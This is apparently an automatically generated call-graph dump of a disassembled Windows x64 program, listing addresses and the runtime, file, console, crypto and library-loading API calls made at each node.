7ff6faa7eb10 38362->38363 38365 7ff6faa7eb41 38363->38365 38366 7ff6faa7e30b 38363->38366 38370 7ff6faa7e678 38363->38370 38375 7ff6faa7eb50 DeleteCriticalSection 38365->38375 38366->38353 38368 7ff6faa7e8a4 8 API calls 3 library calls 38366->38368 38368->38355 38369->38353 38376 7ff6faa7e34c 38370->38376 38373 7ff6faa7e6cf InitializeCriticalSectionAndSpinCount 38374 7ff6faa7e6bb 38373->38374 38374->38363 38375->38366 38377 7ff6faa7e3b2 38376->38377 38382 7ff6faa7e3ad 38376->38382 38377->38373 38377->38374 38378 7ff6faa7e47a 38378->38377 38380 7ff6faa7e489 GetProcAddress 38378->38380 38379 7ff6faa7e3e5 LoadLibraryExW 38381 7ff6faa7e40b GetLastError 38379->38381 38379->38382 38380->38377 38383 7ff6faa7e4a1 38380->38383 38381->38382 38384 7ff6faa7e416 LoadLibraryExW 38381->38384 38382->38377 38382->38378 38382->38379 38385 7ff6faa7e458 FreeLibrary 38382->38385 38383->38377 38384->38382 38385->38382 38397 7ff6faa86938 EnterCriticalSection 38386->38397 38388 7ff6faa866d0 38389 7ff6faa88050 32 API calls 38388->38389 38390 7ff6faa866d9 38389->38390 38391 7ff6faa864d0 34 API calls 38390->38391 38396 7ff6faa866e7 38390->38396 38393 7ff6faa866e2 38391->38393 38392 7ff6faa86998 fflush LeaveCriticalSection 38394 7ff6faa866f3 38392->38394 38395 7ff6faa865bc GetStdHandle GetFileType 38393->38395 38394->38359 38395->38396 38396->38392 38399 7ff6faa7b020 pre_c_initialization 38398->38399 38419 7ff6faa82b00 38399->38419 38401 7ff6faa7b02c pre_c_initialization 38425 7ff6faa7aad8 38401->38425 38403 7ff6faa7b045 38404 7ff6faa7b049 _RTC_Initialize 38403->38404 38405 7ff6faa7b0b5 38403->38405 38430 7ff6faa7ace0 38404->38430 38462 7ff6faa7b52c 7 API calls memcpy_s 38405->38462 38407 7ff6faa7b0bf 38463 7ff6faa7b52c 7 API calls memcpy_s 38407->38463 38409 7ff6faa7b05a pre_c_initialization 38433 7ff6faa83b0c 38409->38433 38411 7ff6faa7b0ca __scrt_initialize_default_local_stdio_options 38411->38300 38414 7ff6faa7b06a 38461 7ff6faa7b7dc RtlInitializeSListHead 38414->38461 38416 7ff6faa7b06f pre_c_initialization 38417 7ff6faa84818 pre_c_initialization 35 API calls 38416->38417 38418 7ff6faa7b09a pre_c_initialization 38417->38418 38418->38300 38420 7ff6faa82b11 38419->38420 38421 7ff6faa82b19 38420->38421 38464 7ff6faa84f3c 15 API calls setbuf 38420->38464 38421->38401 38423 7ff6faa82b28 38465 7ff6faa84e1c 31 API calls _invalid_parameter_noinfo 38423->38465 38426 7ff6faa7ab96 38425->38426 38429 7ff6faa7aaf0 __scrt_initialize_onexit_tables 38425->38429 38466 7ff6faa7b52c 7 API calls memcpy_s 38426->38466 38428 7ff6faa7aba0 38429->38403 38467 7ff6faa7ac90 38430->38467 38432 7ff6faa7ace9 38432->38409 38434 7ff6faa83b2a 38433->38434 38435 7ff6faa83b40 38433->38435 38472 7ff6faa84f3c 15 API calls setbuf 38434->38472 38474 7ff6faa89370 38435->38474 38439 7ff6faa83b2f 38473 7ff6faa84e1c 31 API calls _invalid_parameter_noinfo 38439->38473 38440 7ff6faa83b72 38478 7ff6faa838ec 35 API calls pre_c_initialization 38440->38478 38442 7ff6faa7b066 38442->38407 38442->38414 38444 7ff6faa83b9c 38479 7ff6faa83aa8 15 API calls 2 library calls 38444->38479 38446 7ff6faa83bb2 38447 7ff6faa83bcb 38446->38447 38448 7ff6faa83bba 38446->38448 38481 7ff6faa838ec 35 API calls pre_c_initialization 38447->38481 38480 7ff6faa84f3c 15 API calls setbuf 38448->38480 38451 7ff6faa84a74 __free_lconv_mon 15 API calls 38451->38442 38452 7ff6faa83be7 38453 7ff6faa83c17 38452->38453 38454 7ff6faa83c30 38452->38454 38459 7ff6faa83bbf 38452->38459 38482 7ff6faa84a74 38453->38482 38457 7ff6faa84a74 __free_lconv_mon 15 API calls 38454->38457 38456 7ff6faa83c20 38458 7ff6faa84a74 __free_lconv_mon 15 API calls 38456->38458 38457->38459 38460 7ff6faa83c2c 38458->38460 38459->38451 38460->38442 38462->38407 38463->38411 38464->38423 38465->38421 38466->38428 38468 7ff6faa7acbf 38467->38468 38470 7ff6faa7acb5 _onexit 38467->38470 38471 7ff6faa84434 34 API calls _onexit 38468->38471 38470->38432 38471->38470 38472->38439 38473->38442 38475 7ff6faa83b45 GetModuleFileNameA 38474->38475 38476 7ff6faa8937d 38474->38476 38475->38440 38488 7ff6faa891b0 48 API calls 4 library calls 38476->38488 38478->38444 38479->38446 38480->38459 38481->38452 38483 7ff6faa84a79 RtlFreeHeap 38482->38483 38487 7ff6faa84aa9 __free_lconv_mon 38482->38487 38484 7ff6faa84a94 38483->38484 38483->38487 38489 7ff6faa84f3c 15 API calls setbuf 38484->38489 38486 7ff6faa84a99 GetLastError 38486->38487 38487->38456 38488->38475 38489->38486 38491 7ff6faa83c98 38490->38491 38492 7ff6faa83ca1 38490->38492 38491->38492 38496 7ff6faa83ccc 38491->38496 38492->38305 38497 7ff6faa83ce5 38496->38497 38498 7ff6faa83caa 38496->38498 38499 7ff6faa89370 pre_c_initialization 48 API calls 38497->38499 38498->38492 38508 7ff6faa83e78 17 API calls 2 library calls 38498->38508 38500 7ff6faa83cea 38499->38500 38509 7ff6faa8978c GetEnvironmentStringsW 38500->38509 38503 7ff6faa83cf7 38506 7ff6faa84a74 __free_lconv_mon 15 API calls 38503->38506 38505 7ff6faa83d04 38507 7ff6faa84a74 __free_lconv_mon 15 API calls 38505->38507 38506->38498 38507->38503 38508->38492 38510 7ff6faa8985e 38509->38510 38511 7ff6faa897ba WideCharToMultiByte 38509->38511 38513 7ff6faa83cef 38510->38513 38514 7ff6faa89868 FreeEnvironmentStringsW 38510->38514 38511->38510 38515 7ff6faa89814 38511->38515 38513->38503 38521 7ff6faa83d38 31 API calls 4 library calls 38513->38521 38514->38513 38522 7ff6faa84ab4 38515->38522 38518 7ff6faa8984b 38520 7ff6faa84a74 __free_lconv_mon 15 API calls 38518->38520 38519 7ff6faa89824 WideCharToMultiByte 38519->38518 38520->38510 38521->38505 38523 7ff6faa84aff 38522->38523 38527 7ff6faa84ac3 __vcrt_getptd_noexit 38522->38527 38532 7ff6faa84f3c 15 API calls setbuf 38523->38532 38525 7ff6faa84ae6 RtlAllocateHeap 38526 7ff6faa84afd 38525->38526 38525->38527 38526->38518 38526->38519 38527->38523 38527->38525 38529 7ff6faa836c0 38527->38529 38533 7ff6faa83700 38529->38533 38532->38526 38538 7ff6faa86938 EnterCriticalSection 38533->38538 38535 7ff6faa8370d 38536 7ff6faa86998 fflush LeaveCriticalSection 38535->38536 38537 7ff6faa836d2 38536->38537 38537->38527 38540 7ff6faa57e45 38539->38540 38541 7ff6faa6b496 GetProcAddress 38539->38541 38544 7ff6faa37a68 38540->38544 38542 7ff6faa6b4cb GetProcAddress 38541->38542 38543 7ff6faa6b4ae 38541->38543 38542->38540 38543->38542 38545 7ff6faa37a76 38544->38545 38565 7ff6faa82ae4 38545->38565 38547 7ff6faa37a80 38548 7ff6faa82ae4 setbuf 60 API calls 38547->38548 38549 7ff6faa37a94 38548->38549 38574 7ff6faa37b44 GetStdHandle GetFileType 38549->38574 38552 7ff6faa37b44 3 API calls 38553 7ff6faa37aae 38552->38553 38554 7ff6faa37b44 3 API calls 38553->38554 38556 7ff6faa37abe 38554->38556 38555 7ff6faa37b12 38564 7ff6faa3cd78 SetConsoleCtrlHandler 38555->38564 38558 7ff6faa37aeb 38556->38558 38577 7ff6faa82abc 31 API calls 2 library calls 38556->38577 38558->38555 38579 7ff6faa82abc 31 API calls 2 library calls 38558->38579 38559 7ff6faa37adf 38578 7ff6faa82b40 33 API calls 2 library calls 38559->38578 38562 7ff6faa37b06 38580 7ff6faa82b40 33 API calls 2 library calls 38562->38580 38566 7ff6faa82ae9 38565->38566 38567 7ff6faa87ee8 38566->38567 38570 7ff6faa87f23 38566->38570 38581 7ff6faa84f3c 15 API calls setbuf 38567->38581 38569 7ff6faa87eed 38582 7ff6faa84e1c 31 API calls _invalid_parameter_noinfo 38569->38582 38583 7ff6faa87d98 60 API calls 2 library calls 38570->38583 38573 7ff6faa87ef8 38573->38547 38575 7ff6faa37b61 GetConsoleMode 38574->38575 38576 7ff6faa37a9e 38574->38576 38575->38576 38576->38552 38577->38559 38578->38558 38579->38562 38580->38555 38581->38569 38582->38573 38583->38573 38584 7ff6faa27a5b 38585 7ff6faa27a60 38584->38585 38587 7ff6faa27af7 38585->38587 38617 7ff6faa39be0 38585->38617 38588 7ff6faa27bda 38587->38588 38720 7ff6faa41e1c GetFileTime 38587->38720 38628 7ff6faa2b540 38588->38628 38593 7ff6faa2b540 147 API calls 38596 7ff6faa27c9c 38593->38596 38594 7ff6faa27c3e 38594->38593 38595 7ff6faa27f89 38596->38595 38722 7ff6faa46378 38596->38722 38598 7ff6faa27cd7 38599 7ff6faa46378 4 API calls 38598->38599 38601 7ff6faa27cf3 38599->38601 38600 7ff6faa27de1 38607 7ff6faa27e4e 38600->38607 38733 7ff6faa598dc 38600->38733 38601->38600 38602 7ff6faa27d59 38601->38602 38603 7ff6faa27d38 38601->38603 38606 7ff6faa7a444 new 4 API calls 38602->38606 38726 7ff6faa7a444 38603->38726 38611 7ff6faa27d42 std::bad_alloc::bad_alloc 38606->38611 38739 7ff6faa21204 48 API calls 38607->38739 38609 7ff6faa27eb3 38612 7ff6faa27edb 38609->38612 38740 7ff6faa59680 38609->38740 38611->38600 38732 7ff6faa7ba34 RtlPcToFileHeader RaiseException 38611->38732 38746 7ff6faa46424 8 API calls _UnwindNestedFrames 38612->38746 38614 7ff6faa27f56 38616 7ff6faa2b540 147 API calls 38614->38616 38616->38595 38747 7ff6faa3901c CryptAcquireContextW 38617->38747 38621 7ff6faa39c2a 38757 7ff6faa69ce4 38621->38757 38625 7ff6faa39c5b memcpy_s 38767 7ff6faa7a610 38625->38767 38632 7ff6faa2b55f setbuf 38628->38632 38629 7ff6faa2b5a1 38630 7ff6faa2b5d8 38629->38630 38631 7ff6faa2b5b8 38629->38631 38906 7ff6faa58c1c 38630->38906 38792 7ff6faa2aba0 38631->38792 38632->38629 38788 7ff6faa2a4d0 38632->38788 38634 7ff6faa2b5d3 38636 7ff6faa7a610 _UnwindNestedFrames 8 API calls 38634->38636 38637 7ff6faa27bf8 38636->38637 38637->38594 38721 7ff6faa79b98 216 API calls 3 library calls 38637->38721 38638 7ff6faa2bbae 38641 7ff6faa58d00 48 API calls 38638->38641 38639 7ff6faa2b6a5 38639->38634 38651 7ff6faa2b6b5 38639->38651 38670 7ff6faa2b79f 38639->38670 38640 7ff6faa42574 126 API calls 38640->38634 38643 7ff6faa2bc5c 38641->38643 38975 7ff6faa58d38 48 API calls 38643->38975 38647 7ff6faa2bc69 38976 7ff6faa58d38 48 API calls 38647->38976 38650 7ff6faa2b67f 38650->38638 38650->38639 38658 7ff6faa2bc91 38650->38658 38651->38634 38940 7ff6faa58d00 38651->38940 38652 7ff6faa2bc76 38977 7ff6faa58d38 48 API calls 38652->38977 38654 7ff6faa2bc84 38978 7ff6faa58d88 48 API calls 38654->38978 38658->38634 38658->38640 38660 7ff6faa2b726 38944 7ff6faa58d38 48 API calls 38660->38944 38662 7ff6faa2b733 38663 7ff6faa2b749 38662->38663 38945 7ff6faa58d88 48 API calls 38662->38945 38665 7ff6faa2b75c 38663->38665 38946 7ff6faa58d38 48 API calls 38663->38946 38667 7ff6faa2b779 38665->38667 38669 7ff6faa58d00 48 API calls 38665->38669 38947 7ff6faa58f94 38667->38947 38669->38665 38671 7ff6faa2b8e5 38670->38671 38957 7ff6faa2c3c8 CharLowerW CharUpperW 38670->38957 38958 7ff6faa6d840 WideCharToMultiByte 38671->38958 38675 7ff6faa2b9a1 38676 7ff6faa58d00 48 API calls 38675->38676 38678 7ff6faa2b9c4 38676->38678 38961 7ff6faa58d38 48 API calls 38678->38961 38680 7ff6faa2b910 38680->38675 38960 7ff6faa2945c 55 API calls _UnwindNestedFrames 38680->38960 38681 7ff6faa2b9d1 38962 7ff6faa58d38 48 API calls 38681->38962 38683 7ff6faa2b9de 38963 7ff6faa58d88 48 API calls 38683->38963 38685 7ff6faa2b9eb 38964 7ff6faa58d88 48 API calls 38685->38964 38687 7ff6faa2ba0b 38688 7ff6faa58d00 48 API calls 38687->38688 38689 7ff6faa2ba27 38688->38689 38965 7ff6faa58d88 48 API calls 38689->38965 38691 7ff6faa2ba37 38692 7ff6faa2ba49 38691->38692 38966 7ff6faa6bc48 15 API calls 38691->38966 38967 7ff6faa58d88 48 API calls 38692->38967 38695 7ff6faa2ba59 38696 7ff6faa58d00 48 API calls 38695->38696 38697 7ff6faa2ba66 38696->38697 38698 7ff6faa58d00 48 API calls 38697->38698 38699 7ff6faa2ba78 38698->38699 38968 7ff6faa58d38 48 API calls 38699->38968 38701 7ff6faa2ba85 38969 7ff6faa58d88 48 API calls 38701->38969 38703 7ff6faa2ba92 38704 7ff6faa2bacd 38703->38704 38970 7ff6faa58d88 48 API calls 38703->38970 38972 7ff6faa58e3c 38704->38972 38706 7ff6faa2bab2 38971 7ff6faa58d88 48 API calls 38706->38971 38709 7ff6faa2bb33 38711 7ff6faa2bb53 38709->38711 38715 7ff6faa58e3c 48 API calls 38709->38715 38716 7ff6faa2bb6e 38711->38716 38717 7ff6faa58e3c 48 API calls 38711->38717 38712 7ff6faa58d00 48 API calls 38713 7ff6faa2bb09 38712->38713 38713->38709 38714 7ff6faa58e3c 48 API calls 38713->38714 38714->38709 38715->38711 38718 7ff6faa58f94 126 API calls 38716->38718 38717->38716 38718->38634 38720->38588 38721->38594 38723 7ff6faa46396 38722->38723 38725 7ff6faa463a0 38722->38725 38724 7ff6faa7a444 new 4 API calls 38723->38724 38724->38725 38725->38598 38729 7ff6faa7a44f 38726->38729 38727 7ff6faa7a47a 38727->38611 38728 7ff6faa836c0 new 2 API calls 38728->38729 38729->38727 38729->38728 39160 7ff6faa7b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38729->39160 39161 7ff6faa7b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38729->39161 38732->38600 38734 7ff6faa5993c 38733->38734 38735 7ff6faa59926 38733->38735 38737 7ff6faa390b8 75 API calls 38734->38737 38736 7ff6faa390b8 75 API calls 38735->38736 38738 7ff6faa59934 38736->38738 38737->38738 38738->38607 38739->38609 38744 7ff6faa596a4 38740->38744 38741 7ff6faa597d7 38742 7ff6faa42574 126 API calls 38742->38744 38744->38741 38744->38742 38745 7ff6faa79b98 216 API calls 38744->38745 39162 7ff6faa46498 72 API calls new 38744->39162 38745->38744 38746->38614 38748 7ff6faa39057 CryptGenRandom CryptReleaseContext 38747->38748 38749 7ff6faa3907e 38747->38749 38748->38749 38750 7ff6faa39089 38748->38750 38751 7ff6faa39c9c 11 API calls 38749->38751 38752 7ff6faa39c9c 38750->38752 38751->38750 38776 7ff6faa6c0a8 GetSystemTime SystemTimeToFileTime 38752->38776 38754 7ff6faa39cc5 38779 7ff6faa82d74 38754->38779 38758 7ff6faa39c49 38757->38758 38759 7ff6faa69d15 memcpy_s 38757->38759 38761 7ff6faa69b70 38758->38761 38759->38758 38782 7ff6faa69d74 38759->38782 38763 7ff6faa69bd9 memcpy_s 38761->38763 38765 7ff6faa69bad memcpy_s 38761->38765 38762 7ff6faa69d74 8 API calls 38764 7ff6faa69c07 38762->38764 38763->38762 38764->38625 38765->38763 38766 7ff6faa69d74 8 API calls 38765->38766 38766->38763 38768 7ff6faa7a61a 38767->38768 38769 7ff6faa39c86 38768->38769 38770 7ff6faa7a6a0 IsProcessorFeaturePresent 38768->38770 38769->38587 38771 7ff6faa7a6b7 38770->38771 38786 7ff6faa7a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38771->38786 38773 7ff6faa7a6ca 38787 7ff6faa7a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38773->38787 38777 7ff6faa7a610 _UnwindNestedFrames 8 API calls 38776->38777 38778 7ff6faa6c0f1 38777->38778 38778->38754 38780 7ff6faa82d8b QueryPerformanceCounter 38779->38780 38781 7ff6faa39cd7 38779->38781 38780->38781 38781->38621 38783 7ff6faa69dbc 38782->38783 38783->38783 38784 7ff6faa7a610 _UnwindNestedFrames 8 API calls 38783->38784 38785 7ff6faa69f40 38784->38785 38785->38759 38786->38773 38789 7ff6faa2a4ea 38788->38789 38790 7ff6faa2a4ee 38789->38790 38979 7ff6faa42440 38789->38979 38790->38629 38793 7ff6faa2abbf setbuf 38792->38793 38794 7ff6faa58c1c 48 API calls 38793->38794 38797 7ff6faa2abf5 38794->38797 38795 7ff6faa2b4af 38798 7ff6faa2b4ff 38795->38798 38802 7ff6faa42574 126 API calls 38795->38802 38796 7ff6faa2acbf 38799 7ff6faa2acc8 38796->38799 38800 7ff6faa2b35c 38796->38800 38797->38795 38801 7ff6faa39be0 14 API calls 38797->38801 38828 7ff6faa2aca7 38797->38828 39008 7ff6faa572c0 38798->39008 38805 7ff6faa2acdd 38799->38805 38812 7ff6faa2ad60 38799->38812 38848 7ff6faa2aea7 38799->38848 38804 7ff6faa58eec 48 API calls 38800->38804 38806 7ff6faa2ac34 38801->38806 38802->38798 38807 7ff6faa2b395 38804->38807 38808 7ff6faa2ad68 38805->38808 38809 7ff6faa2ace6 38805->38809 38810 7ff6faa390b8 75 API calls 38806->38810 38811 7ff6faa2b3ad 38807->38811 39007 7ff6faa29e2c 48 API calls 38807->39007 38814 7ff6faa58eec 48 API calls 38808->38814 38809->38812 38989 7ff6faa58eec 38809->38989 38813 7ff6faa2ac8f 38810->38813 38817 7ff6faa58eec 48 API calls 38811->38817 38816 7ff6faa7a610 _UnwindNestedFrames 8 API calls 38812->38816 38823 7ff6faa42574 126 API calls 38813->38823 38813->38828 38820 7ff6faa2ad9c 38814->38820 38821 7ff6faa2b52b 38816->38821 38818 7ff6faa2b3d4 38817->38818 38825 7ff6faa58eec 48 API calls 38818->38825 38826 7ff6faa2b3e6 38818->38826 38824 7ff6faa58eec 48 API calls 38820->38824 38821->38634 38823->38828 38829 7ff6faa2ada9 38824->38829 38825->38826 38831 7ff6faa58eec 48 API calls 38826->38831 38827 7ff6faa58eec 48 API calls 38832 7ff6faa2ad31 38827->38832 38828->38795 38828->38796 38830 7ff6faa58eec 48 API calls 38829->38830 38833 7ff6faa2adb5 38830->38833 38834 7ff6faa2b451 38831->38834 38835 7ff6faa58eec 48 API calls 38832->38835 38836 7ff6faa58eec 48 API calls 38833->38836 38837 7ff6faa2b471 38834->38837 38843 7ff6faa58eec 48 API calls 38834->38843 38838 7ff6faa2ad46 38835->38838 38839 7ff6faa2adc2 38836->38839 38841 7ff6faa2b486 38837->38841 38844 7ff6faa58e3c 48 API calls 38837->38844 38840 7ff6faa58f94 126 API calls 38838->38840 38842 7ff6faa58d00 48 API calls 38839->38842 38840->38812 38845 7ff6faa58f94 126 API calls 38841->38845 38846 7ff6faa2adcf 38842->38846 38843->38837 38844->38841 38845->38812 38849 7ff6faa390b8 75 API calls 38846->38849 38847 7ff6faa2afda 38855 7ff6faa2aff2 38847->38855 38998 7ff6faa29d98 48 API calls 38847->38998 38848->38847 38997 7ff6faa29b64 48 API calls _UnwindNestedFrames 38848->38997 38852 7ff6faa2ae22 38849->38852 38853 7ff6faa58e3c 48 API calls 38852->38853 38854 7ff6faa2ae33 38853->38854 38856 7ff6faa58e3c 48 API calls 38854->38856 38857 7ff6faa2b02b 38855->38857 38999 7ff6faa29efc 48 API calls _UnwindNestedFrames 38855->38999 38859 7ff6faa2ae48 38856->38859 38858 7ff6faa2b0af 38857->38858 39000 7ff6faa2a2c8 48 API calls 38857->39000 38862 7ff6faa2b0c8 38858->38862 39001 7ff6faa2a1a0 48 API calls 2 library calls 38858->39001 38866 7ff6faa69ce4 8 API calls 38859->38866 38864 7ff6faa2b0e2 38862->38864 39002 7ff6faa2a350 48 API calls _UnwindNestedFrames 38862->39002 38867 7ff6faa58eec 48 API calls 38864->38867 38868 7ff6faa2ae60 38866->38868 38870 7ff6faa2b0fc 38867->38870 38869 7ff6faa69b70 8 API calls 38868->38869 38871 7ff6faa2ae6d 38869->38871 38872 7ff6faa58eec 48 API calls 38870->38872 38873 7ff6faa58e3c 48 API calls 38871->38873 38874 7ff6faa2b109 38872->38874 38875 7ff6faa2ae80 38873->38875 38876 7ff6faa2b11f 38874->38876 38878 7ff6faa58eec 48 API calls 38874->38878 38877 7ff6faa58f94 126 API calls 38875->38877 38993 7ff6faa58e94 38876->38993 38877->38812 38878->38876 38881 7ff6faa58eec 48 API calls 38882 7ff6faa2b147 38881->38882 38883 7ff6faa58e94 48 API calls 38882->38883 38884 7ff6faa2b15f 38883->38884 38885 7ff6faa58eec 48 API calls 38884->38885 38888 7ff6faa2b16c 38885->38888 38886 7ff6faa2b18a 38887 7ff6faa2b1a9 38886->38887 39004 7ff6faa58d88 48 API calls 38886->39004 38890 7ff6faa58e94 48 API calls 38887->38890 38888->38886 39003 7ff6faa58d88 48 API calls 38888->39003 38892 7ff6faa2b1bc 38890->38892 38893 7ff6faa58eec 48 API calls 38892->38893 38894 7ff6faa2b1d6 38893->38894 38896 7ff6faa2b1e9 38894->38896 39005 7ff6faa2c3c8 CharLowerW CharUpperW 38894->39005 38896->38896 38897 7ff6faa58eec 48 API calls 38896->38897 38898 7ff6faa2b21f 38897->38898 38899 7ff6faa58e3c 48 API calls 38898->38899 38900 7ff6faa2b230 38899->38900 38901 7ff6faa2b247 38900->38901 38902 7ff6faa58e3c 48 API calls 38900->38902 38903 7ff6faa58f94 126 API calls 38901->38903 38902->38901 38904 7ff6faa2b278 38903->38904 38904->38812 39006 7ff6faa570d8 4 API calls 2 library calls 38904->39006 39020 7ff6faa58f28 38906->39020 38909 7ff6faa390b8 38910 7ff6faa39123 38909->38910 38923 7ff6faa391a9 38909->38923 38910->38923 39038 7ff6faa67e74 38910->39038 38911 7ff6faa7a610 _UnwindNestedFrames 8 API calls 38913 7ff6faa2b66e 38911->38913 38925 7ff6faa42574 38913->38925 38915 7ff6faa6d840 WideCharToMultiByte 38916 7ff6faa39157 38915->38916 38917 7ff6faa3916a 38916->38917 38918 7ff6faa391c4 38916->38918 38916->38923 38920 7ff6faa391ab 38917->38920 38921 7ff6faa3916f 38917->38921 39057 7ff6faa39338 12 API calls _UnwindNestedFrames 38918->39057 39056 7ff6faa3951c 71 API calls _UnwindNestedFrames 38920->39056 38921->38923 39042 7ff6faa398b0 38921->39042 38923->38911 38926 7ff6faa4259e 38925->38926 38927 7ff6faa425a5 38925->38927 38926->38650 38928 7ff6faa425ab GetStdHandle 38927->38928 38935 7ff6faa425ba 38927->38935 38928->38935 38929 7ff6faa42619 WriteFile 38929->38935 38930 7ff6faa425cf WriteFile 38931 7ff6faa4260b 38930->38931 38930->38935 38931->38930 38931->38935 38932 7ff6faa42658 GetLastError 38932->38935 38934 7ff6faa42684 SetLastError 38934->38935 38935->38926 38935->38929 38935->38930 38935->38932 38938 7ff6faa42721 38935->38938 39154 7ff6faa43144 9 API calls 2 library calls 38935->39154 39155 7ff6faa3cf34 10 API calls 38935->39155 39156 7ff6faa3c95c 126 API calls 38935->39156 39157 7ff6faa3cf14 10 API calls 38938->39157 38941 7ff6faa2161c 48 API calls 38940->38941 38942 7ff6faa2b719 38941->38942 38943 7ff6faa58d38 48 API calls 38942->38943 38943->38660 38944->38662 38945->38663 38946->38665 38948 7ff6faa59131 38947->38948 38949 7ff6faa58fcf 38947->38949 38948->38634 38956 7ff6faa5905d 38949->38956 39158 7ff6faa3ca6c 48 API calls 2 library calls 38949->39158 38950 7ff6faa2161c 48 API calls 38951 7ff6faa590e0 38950->38951 38951->38948 38952 7ff6faa42574 126 API calls 38951->38952 38952->38948 38954 7ff6faa5904c 39159 7ff6faa3ca40 61 API calls _CxxThrowException 38954->39159 38956->38950 38956->38951 38957->38671 38959 7ff6faa2b8f8 CharToOemA 38958->38959 38959->38680 38960->38675 38961->38681 38962->38683 38963->38685 38964->38687 38965->38691 38966->38692 38967->38695 38968->38701 38969->38703 38970->38706 38971->38704 38973 7ff6faa2161c 48 API calls 38972->38973 38974 7ff6faa2baf2 38973->38974 38974->38709 38974->38712 38974->38713 38975->38647 38976->38652 38977->38654 38978->38658 38980 7ff6faa4246a SetFilePointer 38979->38980 38981 7ff6faa42454 38979->38981 38982 7ff6faa424ad 38980->38982 38983 7ff6faa4248d GetLastError 38980->38983 38981->38982 38987 7ff6faa3cd00 10 API calls 38981->38987 38982->38790 38983->38982 38984 7ff6faa42497 38983->38984 38984->38982 38988 7ff6faa3cd00 10 API calls 38984->38988 38990 7ff6faa58efc 38989->38990 38991 7ff6faa58d00 48 API calls 38990->38991 38992 7ff6faa2ad24 38990->38992 38991->38990 38992->38827 38994 7ff6faa58eac 38993->38994 38995 7ff6faa58d00 48 API calls 38994->38995 38996 7ff6faa2b137 38994->38996 38995->38994 38996->38881 38997->38847 38998->38855 38999->38857 39000->38858 39001->38862 39002->38864 39003->38886 39004->38887 39005->38896 39006->38812 39007->38811 39009 7ff6faa572dd 39008->39009 39010 7ff6faa57304 39009->39010 39012 7ff6faa7a480 39009->39012 39010->38812 39015 7ff6faa7a444 39012->39015 39013 7ff6faa7a47a 39013->39010 39014 7ff6faa836c0 new 2 API calls 39014->39015 39015->39013 39015->39014 39018 7ff6faa7b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39015->39018 39019 7ff6faa7b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39015->39019 39023 7ff6faa2161c 39020->39023 39022 7ff6faa2b601 39022->38650 39022->38658 39022->38909 39024 7ff6faa21640 39023->39024 39033 7ff6faa216aa memcpy_s 39023->39033 39025 7ff6faa2166d 39024->39025 39034 7ff6faa3ca6c 48 API calls 2 library calls 39024->39034 39027 7ff6faa216d4 39025->39027 39028 7ff6faa2168e 39025->39028 39027->39033 39037 7ff6faa3cb64 8 API calls 39027->39037 39028->39033 39036 7ff6faa3cb64 8 API calls 39028->39036 39029 7ff6faa21661 39035 7ff6faa3cb64 8 API calls 39029->39035 39033->39022 39034->39029 39039 7ff6faa39143 39038->39039 39040 7ff6faa67e95 39038->39040 39039->38915 39058 7ff6faa67ec8 39040->39058 39043 7ff6faa39b45 39042->39043 39047 7ff6faa39920 39042->39047 39044 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39043->39044 39045 7ff6faa39b61 39044->39045 39045->38923 39048 7ff6faa3996d 39047->39048 39049 7ff6faa39b75 39047->39049 39090 7ff6faa67da8 39047->39090 39048->39048 39097 7ff6faa3a0f4 39048->39097 39050 7ff6faa67f24 68 API calls 39049->39050 39053 7ff6faa39acb 39050->39053 39052 7ff6faa399d0 39052->39052 39113 7ff6faa67f24 39052->39113 39053->39043 39127 7ff6faa64ea8 8 API calls _UnwindNestedFrames 39053->39127 39056->38923 39057->38923 39059 7ff6faa67efa memcpy_s 39058->39059 39064 7ff6faa67fb5 39059->39064 39072 7ff6faa6b3f0 39059->39072 39061 7ff6faa6805c GetCurrentProcessId 39063 7ff6faa68034 39061->39063 39063->39039 39064->39061 39066 7ff6faa67ff1 39064->39066 39065 7ff6faa67f7e GetProcAddressForCaller GetProcAddress 39065->39064 39066->39063 39081 7ff6faa3ca6c 48 API calls 2 library calls 39066->39081 39068 7ff6faa6801f 39082 7ff6faa3cda4 10 API calls 2 library calls 39068->39082 39070 7ff6faa68027 39083 7ff6faa3ca40 61 API calls _CxxThrowException 39070->39083 39084 7ff6faa7a5a0 39072->39084 39075 7ff6faa6b42c 39086 7ff6faa548bc 39075->39086 39076 7ff6faa6b428 39079 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39076->39079 39080 7ff6faa67f72 39079->39080 39080->39064 39080->39065 39081->39068 39082->39070 39083->39063 39085 7ff6faa6b3fc GetSystemDirectoryW 39084->39085 39085->39075 39085->39076 39087 7ff6faa548cb setbuf 39086->39087 39088 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39087->39088 39089 7ff6faa5493a LoadLibraryExW 39088->39089 39089->39076 39091 7ff6faa67e74 68 API calls 39090->39091 39092 7ff6faa67ddc 39091->39092 39093 7ff6faa67e74 68 API calls 39092->39093 39094 7ff6faa67def 39093->39094 39095 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39094->39095 39096 7ff6faa67e43 39095->39096 39096->39047 39100 7ff6faa3a15c memcpy_s 39097->39100 39098 7ff6faa3a358 39150 7ff6faa7a774 8 API calls __report_securityfailure 39098->39150 39100->39098 39101 7ff6faa3a352 39100->39101 39104 7ff6faa3a34d 39100->39104 39105 7ff6faa3a192 39100->39105 39149 7ff6faa7a774 8 API calls __report_securityfailure 39101->39149 39103 7ff6faa3a35e 39148 7ff6faa7a774 8 API calls __report_securityfailure 39104->39148 39128 7ff6faa39dd8 39105->39128 39108 7ff6faa3a1d9 39109 7ff6faa39dd8 8 API calls 39108->39109 39110 7ff6faa3a2f1 39108->39110 39109->39108 39111 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39110->39111 39112 7ff6faa3a33b 39111->39112 39112->39052 39114 7ff6faa67fb5 39113->39114 39115 7ff6faa67f5e 39113->39115 39117 7ff6faa6805c GetCurrentProcessId 39114->39117 39121 7ff6faa67ff1 39114->39121 39115->39114 39116 7ff6faa6b3f0 10 API calls 39115->39116 39118 7ff6faa67f72 39116->39118 39119 7ff6faa68034 39117->39119 39118->39114 39120 7ff6faa67f7e GetProcAddressForCaller GetProcAddress 